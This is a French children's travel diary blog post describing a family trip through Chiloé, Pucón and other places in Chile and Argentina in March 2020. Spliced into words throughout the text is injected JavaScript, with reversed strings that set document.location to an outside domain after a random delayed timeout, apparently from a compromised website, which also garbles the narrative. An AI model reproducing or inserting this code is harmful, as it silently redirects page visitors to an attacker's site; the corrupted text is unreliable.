On visite Chiloé !

by Clément

Samedi 29 février 2020. Volcan Osorno, Chili
On a pris un télésiège pour aller voir le volcan Osorno.
Dimanche 1 mars 2020 Volcan Osorno Chile
On est allés sur le volcan Osorno et quand on s’est réveillés on était par dessus les nuages!  Après on a rejoint Amandine à l’aéroport.

Lundi 2 mars. Ile de Chiloé, Chili
Avec Amandine, on est allés sur l’île de Chiloé. On a mangé pleins de mûres très bonnes. On a visité plusieurs églises très vieilles. Et comme elles étaient très vieilles, elles étaient toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes en bois. En fin d’après-midi on a pris un ferry pour aller sur la Isla Quinchao. On a trouvé une très belle plage pour dormir. On a fait un très beau feu de bois pour faire griller des saucisses. Avec papa on a encore essayé de pêcher, mais on a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours rien attrapé… Comme d’hab quoi !!

Mardi 3 mars 2020. Ile de Chiloé, Chili.
Le matin quand on s’est réveillés il y avait deux dauphins qui jouaient dans la mer. Après on est allés à Castro. Il y avait plein de maisons sur pilotis. En fin d’après-midi, on a pris un petit bateau pour aller voir El Muelle de la Luz à Chepu Chepu. C’est un très beau mirador. Dans la crique un peu après, Alice et moi on s’est beaucoup amusés dans les vagues.
Mercredi 4 mars 2020 Ile de Chiloé Chili
On est allés au nord de Chiloé à Ancud, dans un restaurant pour manger le plat typique : Curantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. Et puis après on s’est promenés dans la ville.

Vendredi 6 mars 2020.
On a retrouvé les suiveurs d’étoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toile. On est allés sur une plage pour pêcher. Après on a arrêté de pêcher parce qu’ on en avait marre et sur la plage on a fait une grande ville en sable ! Les murailles étaient très solides. Après on s’est baignés dans le lac, il était gelé !

Dimanche 8 mars 2020. San Martin de los Andes , Argentine.
Aujourd’hui, on a fait la route des 7 lacs, C’était 7 très beaux lacs, on aurait dit des miroirs car on y voyait aussi bien que dans un miroir. Dans l’après-midi on est arrivé à San Martin de los Andes.
On a retrouvé Rodriguo, Paola, et Claudia et Patricio « Los Patiperros ». Après on s’est promenés dans la rue commerçante. On est restés deux jours dans ce village.

Mercredi 11 mars 2020. Pucon, Chili
Aujourd’hui c’est l’anniversaire d’ Alice. On est allés aux Thermes (Il y avait de l’eau super chaude, et même des fois bouillante !!). Maman et moi, on a fait le gâteau d’anniversaire et le soir on a mangé des Burgers au restaurant. Moi j’ai pris un burger qui était censé être petit mais il était tellement énorme qu’il ne rentrait pas dans ma bouche. Alors j’ai été obligé de le couper en deux.

Vendredi 13 mars 2020. Pucon, Chili
Aujourd’hui on a grimpé sur un Volcan qui s’appelle Villarica. On a commencé la randonnée mais on n’a pas pu aller très loin car on s’est fait surprendre par la pluie. Du coup,on a fait demi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour. Avec Maman, on a mangé plein de calafatés, mais a un moment Maman a failli manger une baie noire : » Non Maman ce ne sont pas des calafates!!!!! » Heureusement que je suis là, sinon elle se serait trompée !!!! On a dormi au pied du volcan.

Samedi 14 mars 2020. Cañi, Chili
On a fait une grande randonnée de 20 Km. On a fait ça pour aller voir quatre volcans, au début la montée était très raide et il y avait pleins de coureurs qui faisaient une course. On les a encouragés en criant : »Vamos Vamos » toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le long. On est passés à des endroits où il y avait plein d’araucarias. Ce sont des arbres qui font des pignons de la taille d’un petit doigt !!! Arrivés en haut, on a vu les 4 volcans. Ils étaient magnifiques. Il y avait : Villarica, Lanin et les deux autres (je ne me rappelle plus de leurs noms…) Il y avait de la neige et il y en avait un qui ressemblait à une muraille. En redescendant on a fait un autre toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour pour voir pleins de lagunes. Après la randonnée, j’ai ramassé plein de prunes et j’ai demandé à maman de faire de la confiture. Après, sur la route, on a vu que le volcan Villarica fumait. « Regardez le volcan fume !!!! »

Dimanche 15 mars 2020 au 27 mars 2020 Malalcahuello Chili
On va au bord d’une rivière pour y rester deux semaines. C’est un endroit vraiment super. On a rencontré des gens très gentils. Ils s’appellent Dayan, Derek, Catherine, Diego,….

Ici on peut faire plein de choses !

  • Pécher au bouchon et à la cuillère
  • Se laver dans la rivière
  • Jouer sur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les îles (il y en avait une dizaine)
  • Ramasser des pignons d’araucaria
  • Se baigner dans l’eau fraîche

Il y avait aussi un immense endroit entre la rivière et la route pour jouer. J’adore cet endroit. Au fait le 24 mars c’est l’anniversaire de maman. Elle a eu 40 ans ! On lui a fait plein de cadeaux qu’on a fabriqués nous mêmes.